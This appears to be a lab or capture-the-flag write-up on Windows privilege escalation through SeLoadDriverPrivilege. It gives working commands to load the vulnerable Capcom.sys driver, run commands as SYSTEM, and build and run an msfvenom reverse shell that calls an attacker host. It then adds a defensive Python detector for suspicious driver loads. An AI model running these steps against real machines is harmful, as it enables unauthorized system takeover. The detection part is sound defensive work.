SeLoadDriver Privilege
The last GitHub link has all the instructions.
Upload eoploaddriver_x64.exe, Capcom.sys and ExploitCapcom.exe to a writable directory on the target machine.
First we need to enable SeLoadDriverPrivilege, which is disabled.
.\eoploaddriver_x64.exe System\CurrentControlSet\dfserv C:\Temp\Capcom.sys
Now load Capcom.sys on the target machine using ExploitCapcom.exe.
.\ExploitCapcom.exe LOAD C:\Temp\Capcom.sys
After Capcom.sys has loaded successfully, we can run any command as a privileged user with the EXPLOIT keyword.
.\ExploitCapcom.exe EXPLOIT whoami
Now generate a reverse shell with msfvenom (any other reverse shell works too). On the attacker VM:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f exe > shell.exe
Upload it to the target machine, then execute the payload.
.\ExploitCapcom.exe EXPLOIT shell.exe
You will get a reverse shell as SYSTEM.
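From the defender's side, the technique above leaves a distinctive trace: a driver loaded from a user-writable directory such as C:\Temp rather than from the system drivers directory, and a known-abused file name. The following is an added detection example, not code from the write-up or from the tools it names; the event records are constructed to mimic Sysmon Event ID 6 (Driver loaded) fields, and the trusted directories and the known-abused-driver list are assumptions you would tune to your environment.

```python
"""Flag suspicious kernel driver loads in constructed Sysmon-style records.

Added example, not part of the original write-up. Records mimic Sysmon
Event ID 6 (Driver loaded) fields; all sample data below is constructed.
"""
import ntpath

# Directories where legitimately installed drivers normally live (assumption).
TRUSTED_DRIVER_DIRS = (
    r"c:\windows\system32\drivers",
    r"c:\windows\system32\driverstore",
)

# Signed-but-vulnerable drivers abused as loaders; capcom.sys is the one
# the walkthrough above uses. Extend this list from your own intel (assumption).
KNOWN_ABUSED_DRIVERS = {"capcom.sys"}


def classify_driver_load(record):
    """Return the reasons a driver-load record looks suspicious (empty = benign)."""
    path = record.get("ImageLoaded", "")
    name = ntpath.basename(path).lower()
    reasons = []
    if name in KNOWN_ABUSED_DRIVERS:
        reasons.append("known abused driver")
    if not any(path.lower().startswith(d) for d in TRUSTED_DRIVER_DIRS):
        reasons.append("loaded from outside the drivers directory")
    if record.get("Signed", "").lower() != "true":
        reasons.append("unsigned")
    return reasons


def find_suspicious_loads(records):
    """Return (image path, reasons) for every record that triggers a reason."""
    hits = []
    for record in records:
        reasons = classify_driver_load(record)
        if reasons:
            hits.append((record.get("ImageLoaded", ""), reasons))
    return hits


# Constructed sample events: one benign Microsoft driver, the Capcom load
# from the walkthrough, and an unsigned driver from a public directory.
SAMPLE_EVENTS = [
    {"ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys", "Signed": "true"},
    {"ImageLoaded": r"C:\Temp\Capcom.sys", "Signed": "true"},
    {"ImageLoaded": r"C:\Users\Public\foo.sys", "Signed": "false"},
]

if __name__ == "__main__":
    for path, reasons in find_suspicious_loads(SAMPLE_EVENTS):
        print(f"{path}: {', '.join(reasons)}")
```

Note that the Capcom load is flagged even though the file is signed, because a valid signature does not make a driver safe to load; the path check catches the C:\Temp staging that the procedure above relies on.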